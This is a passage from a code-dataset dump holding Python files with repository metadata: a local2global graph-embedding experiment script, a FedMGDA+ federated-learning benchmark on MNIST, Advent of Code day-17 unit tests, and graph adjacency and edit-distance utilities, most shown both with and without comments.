lr=args.lr,
)
coords = embedding(model, patch)
auc = reconstruction_auc(coords, patch, dist=args.dist)
if auc > patch_results.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
best_coords = coords
torch.save(model.state_dict(), patch_folder / f'{basename}_patch{p_ind}_d{d}_best_model.pt')
torch.save(best_coords, coords_file)
update_aligned_embedding = True
patch_results.update_dim(d, [auc], training_args)
patch_results.save(patch_result_file)
patch_list.append(l2g.Patch(patch.nodes.cpu().numpy(), best_coords.cpu().numpy()))
patched_embedding_file = patch_folder / f'{basename}_d{d}_coords.pt'
patched_embedding_file_nt = patch_folder / f'{basename}_d{d}_ntcoords.pt'
if update_aligned_embedding or not patched_embedding_file.is_file():
prob = l2g.WeightedAlignmentProblem(patch_list, patch_edges=patch_graph.edges())
ntcoords = prob.mean_embedding()
coords = prob.get_aligned_embedding()
torch.save(coords, patched_embedding_file)
torch.save(ntcoords, patched_embedding_file_nt)
results.update_dim(d, [reconstruction_auc(torch.as_tensor(coords), data, neg_edges, dist=args.dist)])
nt_results.update_dim(d, [reconstruction_auc(torch.as_tensor(ntcoords), data, neg_edges, dist=args.dist)])
results.save(results_file)
nt_results.save(nt_results_file)
baseline_data = baseline_data.reduce_to_dims(dims)
results = results.reduce_to_dims(dims)
nt_results = nt_results.reduce_to_dims(dims)
if args.plot:
plt.figure()
plt.plot(dims, [max(v) for v in baseline_data['auc']], label='full, inner product', marker='o',
color='tab:blue')
plt.plot(dims, results['auc'], '--', label='l2g, inner product', marker='>', color='tab:blue')
plt.plot(dims, nt_results['auc'], ':', label='no-trans, inner product', color='tab:blue',
linewidth=1)
plt.xscale('log')
plt.xticks(dims, dims)
plt.minorticks_off()
plt.xlabel('embedding dimension')
plt.ylabel('AUC')
plt.legend()
oversampling_ratio = sum(p.num_edges for p in patch_data) / data.num_edges
plt.title(f"oversampling ratio: {oversampling_ratio:.2}, #patches: {len(patch_data)}")
plt.savefig(output_folder / f"{basename}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}.pdf")
plt.show()
if __name__ == '__main__':
# run main script
args = _parser.parse_args()
run(**vars(args))
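# --- Illustrative usage sketch (added for clarity; not part of the original script) ---
# run() can also be driven programmatically: keyword arguments override the argparse
# defaults defined earlier in this script, and unknown keys raise a TypeError. The option
# values below are made-up examples; this helper is never called anywhere in the file.
def _example_programmatic_run():
    return run(data='Cora', dims=[2, 4], cluster='metis', num_clusters=10, plot=False)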
avg_line_length: 39.61302 | max_line_length: 147 | alphanum_fraction: 0.61773
content_no_comment (the same script with comments and docstrings stripped):
import argparse
import json
from pathlib import Path
from bisect import bisect_left
import torch
import torch_geometric as tg
import matplotlib.pyplot as plt
import local2global as l2g
from local2global_embedding.embedding import speye, train, embedding, VGAE_model, VGAE_loss, reconstruction_auc
from local2global_embedding.network import largest_connected_component, TGraph
from local2global_embedding.patches import create_patch_data
from local2global_embedding.clustering import distributed_clustering, fennel_clustering, louvain_clustering, metis_clustering
class ResultsDict:
@classmethod
def load(cls, filename, replace=False):
self = cls(replace=replace)
with open(filename) as f:
self._data.update(json.load(f))
return self
def save(self, filename):
with open(filename, 'w') as f:
json.dump(self._data, f)
def __init__(self, replace=False):
self._data = {'dims': [], 'auc': [], 'args': []}
self.replace = replace
def __getitem__(self, item):
return self._data[item]
def _update_index(self, index, aucs: list, args=None):
if self.replace:
self['auc'][index] = aucs
self['args'][index] = args
else:
self['auc'][index].extend(aucs)
self['args'][index].extend([args] * len(aucs))
def _insert_index(self, index: int, dim: int, aucs: list, args=None):
self['auc'].insert(index, aucs)
self['dims'].insert(index, dim)
self['args'].insert(index, [args] * len(aucs))
def update_dim(self, dim, aucs, args=None):
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
self._update_index(index, aucs, args)
else:
self._insert_index(index, dim, aucs, args)
def max_auc(self, dim=None):
if dim is None:
return [max(aucs) for aucs in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return max(self['auc'][index])
else:
return 0.
def contains_dim(self, dim):
index = bisect_left(self['dims'], dim)
return index < len(self['dims']) and self['dims'][index] == dim
def reduce_to_dims(self, dims):
index = [i for i, d in enumerate(dims) if self.contains_dim(d)]
for key1 in self._data:
if isinstance(self._data[key1], list):
self._data[key1] = [self[key1][i] for i in index]
return self
def runs(self, dim=None):
if dim is None:
return [len(x) for x in self['auc']]
else:
index = bisect_left(self['dims'], dim)
if index < len(self['dims']) and self['dims'][index] == dim:
return len(self['auc'][index])
else:
return 0
_dataloaders = {}
def dataloader(name):
def loader(func):
_dataloaders[name] = func
return func
return loader
@dataloader('Cora')
def _load_cora():
return tg.datasets.Planetoid(name='Cora', root='/tmp/cora')[0]
@dataloader('PubMed')
def _load_pubmed():
return tg.datasets.Planetoid(name='PubMed', root='/tmp/pubmed')[0]
@dataloader('AMZ_computers')
def _load_amazon_computers():
return tg.datasets.Amazon(root='/tmp/amazon', name='Computers')[0]
@dataloader('AMZ_photo')
def _load_amazon_photos():
return tg.datasets.Amazon(root='/tmp/amazon', name='photo')[0]
def load_data(name):
data = _dataloaders[name]()
data = largest_connected_component(data=data)
data.num_nodes = data.x.shape[0]
return data
if load_data.__doc__:  # the docstring may have been stripped in this comment-free copy
    load_data.__doc__ = load_data.__doc__.format(names=list(_dataloaders.keys()))
def prepare_patches(output_folder, **kwargs):
output_folder = Path(output_folder)
if output_folder.is_dir():
patch_graph = torch.load(output_folder / 'patch_graph.pt')
patch_data = [torch.load(output_folder / f"patch{i}.pt") for i in range(patch_graph.num_nodes)]
else:
patch_data, patch_graph = create_patch_data(**kwargs)
output_folder.mkdir(parents=True)
torch.save(patch_graph, output_folder / 'patch_graph.pt')
for i, data in enumerate(patch_data):
torch.save(data, output_folder / f'patch{i}.pt')
return patch_data, patch_graph
def csvlist(input_type=str):
def make_list(input_str):
return [input_type(s) for s in input_str.split(',')]
make_list.__doc__ = f"""
argparse type that parses comma separated list of type {input_type}
Args:
input_str: string to be parsed
Returns:
list of elements of type {input_type}
"""
return make_list
_parser = argparse.ArgumentParser(description="Run training example.")
_parser.add_argument('--data', default='Cora', choices=_dataloaders.keys(), help='Dataset to load')
_parser.add_argument('--no_features', action='store_true', help='Discard features and use node identity.')
_parser.add_argument('--num_epochs', type=int, default=200, help='Number of training epochs')
_parser.add_argument('--runs', type=int, default=10, help='Number of training runs (keep best result)')
_parser.add_argument('--dims', type=csvlist(int), default=[2], help='Embedding dimensions (comma-separated)')
_parser.add_argument('--hidden_multiplier', type=int, default=2, help='Hidden dim is `hidden_multiplier` * `dim`')
_parser.add_argument('--target_patch_degree', type=float, default=4.0, help='Target patch degree for sparsification.')
_parser.add_argument('--min_overlap', type=int, default=None, help='Minimum target patch overlap (defaults to `max(dims) + 1`)')
_parser.add_argument('--target_overlap', type=int, default=None, help='Target patch overlap (defaults to twice `min_overlap`)')
_parser.add_argument('--gamma', type=float, default=0.0, help="Value of 'gamma' for RMST sparsification.")
_parser.add_argument('--sparsify', default='resistance', help="Sparsification method to use.",
choices={'resistance', 'rmst', 'none'})
_parser.add_argument('--cluster', default='metis', choices={'louvain', 'distributed', 'fennel', 'metis'}, help="Clustering method to use")
_parser.add_argument('--num_clusters', default=10, type=int, help="Target number of clusters for fennel, or metis.")
_parser.add_argument('--beta', default=0.1, type=float, help="Beta value for distributed")
_parser.add_argument('--num_iters', default=None, type=int, help="Maximum iterations for distributed or fennel (default depends on method choice)")
_parser.add_argument('--lr', default=0.01, type=float, help='Learning rate')
_parser.add_argument('--dist', action='store_true', help='use distance decoder instead of inner product decoder')
_parser.add_argument('--output',
default='.',
help='output folder')
_parser.add_argument('--device', default=None, help="Device used for training e.g., 'cpu', 'cuda'")
_parser.add_argument('--plot', action='store_true', help='Plot embedding performance')
_parser.add_argument('--verbose', action='store_true', help='Show progress info')
def run(**kwargs):
args = _parser.parse_args([])
for key, value in kwargs.items():
if key in args:
setattr(args, key, value)
else:
raise TypeError(f'Unknown argument {key}')
output_folder = Path(args.output)
data = load_data(args.data)
neg_edges = tg.utils.negative_sampling(data.edge_index, data.num_nodes)
graph = TGraph(data.edge_index, data.edge_attr)
basename = args.data
dims = args.dims
num_epochs = args.num_epochs
runs = args.runs
min_overlap = args.min_overlap if args.min_overlap is not None else max(dims) + 1
target_overlap = args.target_overlap if args.target_overlap is not None else 2 * max(dims)
if args.no_features:
data.x = None
basename += '_no_features'
if args.dist:
basename += '_dist'
if args.sparsify == 'resistance':
sp_string = f"resistance_deg{args.target_patch_degree}"
elif args.sparsify == 'rmst':
sp_string = f"rmst_gamma{args.gamma}"
elif args.sparsify == 'none':
sp_string = "no_sparsify"
else:
raise RuntimeError(f"Unknown sparsification method '{args.sparsify}'.")
if args.cluster == 'louvain':
cluster_fun = lambda: louvain_clustering(graph)
cluster_string = 'louvain'
elif args.cluster == 'distributed':
cluster_fun = lambda: distributed_clustering(graph, args.beta, rounds=args.num_iters)
cluster_string = f'distributed_beta{args.beta}_it{args.num_iters}'
elif args.cluster == 'fennel':
cluster_fun = lambda: fennel_clustering(graph, num_clusters=args.num_clusters, randomise_order=True,
num_iters=args.num_iters)
cluster_string = f"fennel_n{args.num_clusters}_it{args.num_iters}"
elif args.cluster == 'metis':
cluster_fun = lambda: metis_clustering(graph, num_clusters=args.num_clusters)
cluster_string = f"metis_n{args.num_clusters}"
else:
raise RuntimeError(f"Unknown cluster method '{args.cluster}'.")
cluster_file = output_folder / f"{args.data}_{cluster_string}_clusters.pt"
if cluster_file.is_file():
clusters = torch.load(cluster_file)
else:
clusters = cluster_fun()
torch.save(clusters, cluster_file)
patch_folder = output_folder / f'{args.data}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}_patches'
patch_data, patch_graph = prepare_patches(
output_folder=patch_folder,
data=data,
partition_tensor=clusters,
min_overlap=min_overlap,
target_overlap=target_overlap,
sparsify_method=args.sparsify,
gamma=args.gamma,
target_patch_degree=args.target_patch_degree,
verbose=args.verbose)
if args.verbose:
print(f'total edges: {data.num_edges}')
print(f'total patch edges: {sum(c.num_edges for c in patch_data)}')
if args.no_features:
data.x = speye(data.num_nodes)
baseline_file = output_folder / f'{basename}_full_info.json'
training_args = {'lr': args.lr, 'num_epochs': args.num_epochs, 'hidden_multiplier': args.hidden_multiplier}
if baseline_file.is_file():
baseline_data = ResultsDict.load(baseline_file)
else:
baseline_data = ResultsDict()
for d in dims:
r = baseline_data.runs(d)
if r < runs:
if args.verbose:
print(f'training full model for {runs-r} runs and d={d}')
for r_it in range(r, runs):
if args.verbose:
print(f"full model (d={d}) run {r_it + 1} of {runs}")
data = data.to(args.device)
model = train(data,
VGAE_model(d, d * args.hidden_multiplier, data.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
verbose=args.verbose,
)
coords = embedding(model, data)
auc = reconstruction_auc(coords, data, dist=args.dist)
if auc > baseline_data.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
torch.save(model.state_dict(), output_folder / f'{basename}_full_d{d}_best_model.pt')
torch.save(coords, output_folder / f'{basename}_full_d{d}_best_coords.pt')
baseline_data.update_dim(d, [auc], training_args)
baseline_data.save(baseline_file)
results_file = patch_folder / f'{basename}_l2g_info.json'
nt_results_file = patch_folder / f'{basename}_nt_info.json'
if results_file.is_file():
results = ResultsDict.load(results_file, replace=True)
else:
results = ResultsDict(replace=True)
if nt_results_file.is_file():
nt_results = ResultsDict.load(nt_results_file, replace=True)
else:
nt_results = ResultsDict(replace=True)
for d in dims:
patch_list = []
update_aligned_embedding = False
for p_ind, patch in enumerate(patch_data):
patch_result_file = patch_folder / f'{basename}_patch{p_ind}_info.json'
if patch_result_file.is_file():
patch_results = ResultsDict.load(patch_result_file)
else:
patch_results = ResultsDict()
coords_file = patch_folder / f'{basename}_patch{p_ind}_d{d}_best_coords.pt'
if coords_file.is_file():
best_coords = torch.load(coords_file)
r = patch_results.runs(d)
if args.no_features:
patch.x = speye(patch.num_nodes)
if r < runs:
if args.verbose:
print(f'training patch{p_ind} for {runs-r} runs and d={d}')
patch = patch.to(args.device)
for r_it in range(r, runs):
if args.verbose:
print(f"patch{p_ind} (d={d}) run {r_it+1} of {runs}")
model = train(patch,
VGAE_model(d, d * args.hidden_multiplier, patch.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
)
coords = embedding(model, patch)
auc = reconstruction_auc(coords, patch, dist=args.dist)
if auc > patch_results.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
best_coords = coords
torch.save(model.state_dict(), patch_folder / f'{basename}_patch{p_ind}_d{d}_best_model.pt')
torch.save(best_coords, coords_file)
update_aligned_embedding = True
patch_results.update_dim(d, [auc], training_args)
patch_results.save(patch_result_file)
patch_list.append(l2g.Patch(patch.nodes.cpu().numpy(), best_coords.cpu().numpy()))
patched_embedding_file = patch_folder / f'{basename}_d{d}_coords.pt'
patched_embedding_file_nt = patch_folder / f'{basename}_d{d}_ntcoords.pt'
if update_aligned_embedding or not patched_embedding_file.is_file():
prob = l2g.WeightedAlignmentProblem(patch_list, patch_edges=patch_graph.edges())
ntcoords = prob.mean_embedding()
coords = prob.get_aligned_embedding()
torch.save(coords, patched_embedding_file)
torch.save(ntcoords, patched_embedding_file_nt)
results.update_dim(d, [reconstruction_auc(torch.as_tensor(coords), data, neg_edges, dist=args.dist)])
nt_results.update_dim(d, [reconstruction_auc(torch.as_tensor(ntcoords), data, neg_edges, dist=args.dist)])
results.save(results_file)
nt_results.save(nt_results_file)
baseline_data = baseline_data.reduce_to_dims(dims)
results = results.reduce_to_dims(dims)
nt_results = nt_results.reduce_to_dims(dims)
if args.plot:
plt.figure()
plt.plot(dims, [max(v) for v in baseline_data['auc']], label='full, inner product', marker='o',
color='tab:blue')
plt.plot(dims, results['auc'], '--', label='l2g, inner product', marker='>', color='tab:blue')
plt.plot(dims, nt_results['auc'], ':', label='no-trans, inner product', color='tab:blue',
linewidth=1)
plt.xscale('log')
plt.xticks(dims, dims)
plt.minorticks_off()
plt.xlabel('embedding dimension')
plt.ylabel('AUC')
plt.legend()
oversampling_ratio = sum(p.num_edges for p in patch_data) / data.num_edges
plt.title(f"oversampling ratio: {oversampling_ratio:.2}, #patches: {len(patch_data)}")
plt.savefig(output_folder / f"{basename}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}.pdf")
plt.show()
if __name__ == '__main__':
args = _parser.parse_args()
run(**vars(args))
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790b08bb6917d38a656b112ba98748029b3f9856 | size: 5,030 | ext: py | lang: Python
repo_path: fedlab_benchmarks/fedmgda+/standalone.py | repo_name: KarhouTam/FedLab-benchmarks | head_hexsha: 6de0ca56f645794ca7eae0f19c6b0117165d3404 | licenses: ["Apache-2.0"]
stars / issues / forks: null
content:
from json import load
import os
import argparse
import random
from copy import deepcopy
import torchvision
import torchvision.transforms as transforms
from torch import nn
import sys
import torch
import numpy as np
import cvxopt
torch.manual_seed(0)
from fedlab.core.client.serial_trainer import SubsetSerialTrainer
from fedlab.utils.aggregator import Aggregators
from fedlab.utils.serialization import SerializationTool
from fedlab.utils.functional import evaluate
from fedlab.utils.functional import get_best_gpu, load_dict
sys.path.append("../")
from models.cnn import CNN_MNIST
def quadprog(Q, q, G, h, A, b):
"""
Input: Numpy arrays, the format follows MATLAB quadprog function: https://www.mathworks.com/help/optim/ug/quadprog.html
Output: Numpy array of the solution
"""
Q = cvxopt.matrix(Q.tolist())
q = cvxopt.matrix(q.tolist(), tc='d')
G = cvxopt.matrix(G.tolist())
h = cvxopt.matrix(h.tolist())
A = cvxopt.matrix(A.tolist())
b = cvxopt.matrix(b.tolist(), tc='d')
sol = cvxopt.solvers.qp(Q, q.T, G.T, h.T, A.T, b)
return np.array(sol['x'])
def optim_lambdas(gradients, lambda0):
epsilon = 0.5
n = len(gradients)
J_t = [grad.numpy() for grad in gradients]
J_t = np.array(J_t)
# target function
Q = 2 * np.dot(J_t, J_t.T)
q = np.array([[0] for i in range(n)])
    # equality constraint
A = np.ones(n).T
b = np.array([1])
# boundary
lb = np.array([max(0, lambda0[i] - epsilon) for i in range(n)])
ub = np.array([min(1, lambda0[i] + epsilon) for i in range(n)])
G = np.zeros((2 * n, n))
for i in range(n):
G[i][i] = -1
G[n + i][i] = 1
h = np.zeros((2 * n, 1))
for i in range(n):
h[i] = -lb[i]
h[n + i] = ub[i]
res = quadprog(Q, q, G, h, A, b)
return res
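# --- Illustrative usage sketch (added for clarity; not part of the original script) ---
# Shows the shapes optim_lambdas() expects: a list of flattened (1-D) torch gradients and
# an initial weight vector lambda0 that sums to one. The client count and gradient dimension
# are made-up example values, and this helper is never called by the training loop below.
def _demo_optim_lambdas(num_clients=3, grad_dim=5):
    fake_gradients = [torch.randn(grad_dim) for _ in range(num_clients)]
    lambda0 = [1.0 / num_clients] * num_clients
    lambdas = optim_lambdas(fake_gradients, lambda0)  # numpy array of shape (num_clients, 1)
    return torch.Tensor(lambdas).view(-1)  # same post-processing as the training loop below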
# usage: python standalone.py --sample_ratio 0.1 --batch_size 10 --epochs 5 --lr <learning_rate>
# configuration
parser = argparse.ArgumentParser(description="Standalone training example")
parser.add_argument("--total_client", type=int, default=10)
parser.add_argument("--com_round", type=int, default=5)
parser.add_argument("--sample_ratio", type=float)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--lr", type=float)
parser.add_argument("--epochs", type=int)
args = parser.parse_args()
# get raw dataset
root = "../datasets/mnist/"
trainset = torchvision.datasets.MNIST(root=root,
train=True,
download=True,
transform=transforms.ToTensor())
testset = torchvision.datasets.MNIST(root=root,
train=False,
download=True,
transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(testset,
batch_size=len(testset),
drop_last=False,
shuffle=False)
# setup
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
gpu = get_best_gpu()
model = CNN_MNIST().cuda(gpu)
# FL settings
num_per_round = int(args.total_client * args.sample_ratio)
aggregator = Aggregators.fedavg_aggregate
total_client_num = args.total_client  # total number of clients
data_indices = load_dict("./mnist_noniid.pkl")
# fedlab setup
local_model = deepcopy(model)
trainer = SubsetSerialTrainer(model=local_model,
dataset=trainset,
data_slices=data_indices,
aggregator=aggregator,
args={
"batch_size": args.batch_size,
"epochs": args.epochs,
"lr": args.lr
})
dynamic_lambdas = np.ones(num_per_round) * 1.0 / num_per_round
# train procedure
to_select = [i for i in range(total_client_num)]
for round in range(args.com_round):
model_parameters = SerializationTool.serialize_model(model)
selection = random.sample(to_select, num_per_round)
parameters = trainer.train(model_parameters=model_parameters,
id_list=selection,
aggregate=False)
gradients = [model_parameters - model for model in parameters]
for i, grad in enumerate(gradients):
gradients[i] = grad / grad.norm()
    print(len(gradients))  # debug output: number of sampled client gradients
    print(gradients[0].shape)  # debug output: flattened gradient shape
    # calculate lambda (FedMGDA+ aggregation weights)
lambda0 = [1.0 / num_per_round for _ in range(num_per_round)]
dynamic_lambdas = torch.Tensor(optim_lambdas(gradients, lambda0)).view(-1)
dt = Aggregators.fedavg_aggregate(gradients, dynamic_lambdas)
serialized_parameters = model_parameters - dt * args.lr
SerializationTool.deserialize_model(model, serialized_parameters)
criterion = nn.CrossEntropyLoss()
loss, acc = evaluate(model, criterion, test_loader)
print("loss: {:.4f}, acc: {:.2f}".format(loss, acc))
avg_line_length: 34.689655 | max_line_length: 123 | alphanum_fraction: 0.615706
content_no_comment (the same script with comments and docstrings stripped):
from json import load
import os
import argparse
import random
from copy import deepcopy
import torchvision
import torchvision.transforms as transforms
from torch import nn
import sys
import torch
import numpy as np
import cvxopt
torch.manual_seed(0)
from fedlab.core.client.serial_trainer import SubsetSerialTrainer
from fedlab.utils.aggregator import Aggregators
from fedlab.utils.serialization import SerializationTool
from fedlab.utils.functional import evaluate
from fedlab.utils.functional import get_best_gpu, load_dict
sys.path.append("../")
from models.cnn import CNN_MNIST
def quadprog(Q, q, G, h, A, b):
Q = cvxopt.matrix(Q.tolist())
q = cvxopt.matrix(q.tolist(), tc='d')
G = cvxopt.matrix(G.tolist())
h = cvxopt.matrix(h.tolist())
A = cvxopt.matrix(A.tolist())
b = cvxopt.matrix(b.tolist(), tc='d')
sol = cvxopt.solvers.qp(Q, q.T, G.T, h.T, A.T, b)
return np.array(sol['x'])
def optim_lambdas(gradients, lambda0):
epsilon = 0.5
n = len(gradients)
J_t = [grad.numpy() for grad in gradients]
J_t = np.array(J_t)
Q = 2 * np.dot(J_t, J_t.T)
q = np.array([[0] for i in range(n)])
A = np.ones(n).T
b = np.array([1])
lb = np.array([max(0, lambda0[i] - epsilon) for i in range(n)])
ub = np.array([min(1, lambda0[i] + epsilon) for i in range(n)])
G = np.zeros((2 * n, n))
for i in range(n):
G[i][i] = -1
G[n + i][i] = 1
h = np.zeros((2 * n, 1))
for i in range(n):
h[i] = -lb[i]
h[n + i] = ub[i]
res = quadprog(Q, q, G, h, A, b)
return res
parser = argparse.ArgumentParser(description="Standalone training example")
parser.add_argument("--total_client", type=int, default=10)
parser.add_argument("--com_round", type=int, default=5)
parser.add_argument("--sample_ratio", type=float)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--lr", type=float)
parser.add_argument("--epochs", type=int)
args = parser.parse_args()
root = "../datasets/mnist/"
trainset = torchvision.datasets.MNIST(root=root,
train=True,
download=True,
transform=transforms.ToTensor())
testset = torchvision.datasets.MNIST(root=root,
train=False,
download=True,
transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(testset,
batch_size=len(testset),
drop_last=False,
shuffle=False)
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
gpu = get_best_gpu()
model = CNN_MNIST().cuda(gpu)
num_per_round = int(args.total_client * args.sample_ratio)
aggregator = Aggregators.fedavg_aggregate
total_client_num = args.total_client
data_indices = load_dict("./mnist_noniid.pkl")
local_model = deepcopy(model)
trainer = SubsetSerialTrainer(model=local_model,
dataset=trainset,
data_slices=data_indices,
aggregator=aggregator,
args={
"batch_size": args.batch_size,
"epochs": args.epochs,
"lr": args.lr
})
dynamic_lambdas = np.ones(num_per_round) * 1.0 / num_per_round
to_select = [i for i in range(total_client_num)]
for round in range(args.com_round):
model_parameters = SerializationTool.serialize_model(model)
selection = random.sample(to_select, num_per_round)
parameters = trainer.train(model_parameters=model_parameters,
id_list=selection,
aggregate=False)
gradients = [model_parameters - model for model in parameters]
for i, grad in enumerate(gradients):
gradients[i] = grad / grad.norm()
print(len(gradients))
print(gradients[0].shape)
lambda0 = [1.0 / num_per_round for _ in range(num_per_round)]
dynamic_lambdas = torch.Tensor(optim_lambdas(gradients, lambda0)).view(-1)
dt = Aggregators.fedavg_aggregate(gradients, dynamic_lambdas)
serialized_parameters = model_parameters - dt * args.lr
SerializationTool.deserialize_model(model, serialized_parameters)
criterion = nn.CrossEntropyLoss()
loss, acc = evaluate(model, criterion, test_loader)
print("loss: {:.4f}, acc: {:.2f}".format(loss, acc))
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790b090b063c370e613c4b73471668b127b66fc5 | size: 1,354 | ext: py | lang: Python
repo_path: test/test_day17.py | repo_name: frangiz/AdventOfCode2018 | head_hexsha: dffbc0a8467d3c31678d9719923c461b0b12d67f | licenses: ["MIT"]
stars / issues / forks: null
content:
"""The tests for day17."""
from days import day17
from ddt import ddt, data, unpack
import unittest
import helpers
@ddt
class MyTestCase(unittest.TestCase): # noqa D101
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '57'])
@unpack
def test_example_a(self, test_input, expected): # noqa D102
result = day17.part_a(test_input)
self.assertEqual(result, expected)
def test_answer_part_a(self): # noqa D102
result = day17.part_a(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '38021')
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '29'])
@unpack
def test_example_b(self, test_input, expected): # noqa D102
result = day17.part_b(test_input)
self.assertEqual(result, expected)
def test_answer_part_b(self): # noqa D102
result = day17.part_b(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '32069')
avg_line_length: 28.808511 | max_line_length: 69 | alphanum_fraction: 0.521418
content_no_comment (the same tests with comments and docstrings stripped):
from days import day17
from ddt import ddt, data, unpack
import unittest
import helpers
@ddt
class MyTestCase(unittest.TestCase):
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '57'])
@unpack
def test_example_a(self, test_input, expected):
result = day17.part_a(test_input)
self.assertEqual(result, expected)
def test_answer_part_a(self):
result = day17.part_a(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '38021')
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '29'])
@unpack
def test_example_b(self, test_input, expected):
result = day17.part_b(test_input)
self.assertEqual(result, expected)
def test_answer_part_b(self):
result = day17.part_b(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '32069')
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790b090f6347653937f7ebcfb73826e6f1050b01 | size: 3,483 | ext: py | lang: Python
repo_path: utils/graph_utils.py | repo_name: BrunoKM/rhoana_graph_tools | head_hexsha: 7150f4bc6337ecf51dd9123cf03561a57d655160 | licenses: ["MIT"]
stars: 1 (2018-08-17T00:12:30.000Z) | issues: null | forks: 1 (2019-05-19T07:08:54.000Z)
content:
import numpy as np
import networkx as nx
if __name__ == '__main__':
from ged4py.algorithm import graph_edit_dist
else:
from .ged4py.algorithm import graph_edit_dist
def rearrange_adj_matrix(matrix, ordering):
assert matrix.ndim == 2
# Check that matrix is square
assert matrix.shape[0] == matrix.shape[1]
num_nodes = matrix.shape[0]
assert len(ordering) == num_nodes
# Swap rows into correct ordering
matrix = matrix[ordering, :]
# Swap columns into correct ordering
matrix = matrix[:, ordering]
return matrix
def rand_permute_adj_matrix(matrix):
"""Randomly permute the order of vertices in the adjacency matrix, while maintaining the connectivity
between them."""
num_vertices = matrix.shape[0]
rand_order = np.arange(num_vertices)
np.random.shuffle(rand_order)
matrix_permuted = rearrange_adj_matrix(matrix, rand_order)
return matrix_permuted
def ged_from_adj(adj_mat_1, adj_mat_2, directed=False, ged_function=graph_edit_dist.compare):
"""Calculate the graph edit distance between two graphs"""
if directed:
create_using = nx.DiGraph
else:
create_using = nx.Graph
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=create_using())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=create_using())
return ged_function(g1, g2)
def ged_from_adj_nx(adj_mat_1, adj_mat_2, directed=False):
"""Calculate the graph edit distance between two graphs using the networkx implementation"""
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=nx.graph_edit_distance)
def ged_from_adj_ged4py(adj_mat_1, adj_mat_2, directed=False):
"""Calculate the graph edit distance between two graphs using the ged4py implementation"""
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=graph_edit_dist.compare)
def is_isomorphic_from_adj(adj_mat_1, adj_mat_2):
"""Checks whether two graphs are isomorphic taking adjacency matrices as inputs"""
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=nx.DiGraph())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=nx.DiGraph())
return nx.is_isomorphic(g1, g2)
def adj_matrix_to_edge_list(adj_matrix, directed=True, first_id=0, weighted=False):
num_nodes = adj_matrix.shape[0]
if directed:
num_edges = np.sum(adj_matrix)
else:
num_edges = int(np.sum(adj_matrix) / 2)
if weighted:
edge_list = np.zeros([num_edges, 3], dtype=np.int32)
else:
edge_list = np.zeros([num_edges, 2], dtype=np.int32)
i = 0
for node_in in range(num_nodes):
if directed:
range_2 = range(num_nodes)
else:
range_2 = range(node_in + 1, num_nodes)
for node_out in range_2:
edge_val = adj_matrix[node_in, node_out]
if edge_val > 0:
# If there is a connection
if weighted:
edge_list[i] = (node_in + first_id, node_out + first_id, edge_val)
else:
edge_list[i] = (node_in + first_id, node_out + first_id)
i += 1
return edge_list
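# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Demonstrates the helpers above on a tiny, made-up undirected graph: the adjacency matrix
# is converted to an edge list and then randomly relabelled. The function is never called.
def _demo_graph_utils():
    adj = np.array([[0, 1, 1],
                    [1, 0, 0],
                    [1, 0, 0]])
    edges = adj_matrix_to_edge_list(adj, directed=False)  # array([[0, 1], [0, 2]])
    permuted = rand_permute_adj_matrix(adj)  # same graph with vertices reordered
    return edges, permuted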
def edge_list_to_textfile(edge_list, filepath, weighted=False):
with open(filepath, 'w') as file:
if weighted:
for i, j, weight in edge_list:
file.write(f"{i} {j} {weight}\n")
else:
for i, j in edge_list:
file.write(f"{i} {j}\n")
return
avg_line_length: 34.147059 | max_line_length: 105 | alphanum_fraction: 0.676715
content_no_comment (the same module with comments and docstrings stripped):
import numpy as np
import networkx as nx
if __name__ == '__main__':
from ged4py.algorithm import graph_edit_dist
else:
from .ged4py.algorithm import graph_edit_dist
def rearrange_adj_matrix(matrix, ordering):
assert matrix.ndim == 2
assert matrix.shape[0] == matrix.shape[1]
num_nodes = matrix.shape[0]
assert len(ordering) == num_nodes
matrix = matrix[ordering, :]
matrix = matrix[:, ordering]
return matrix
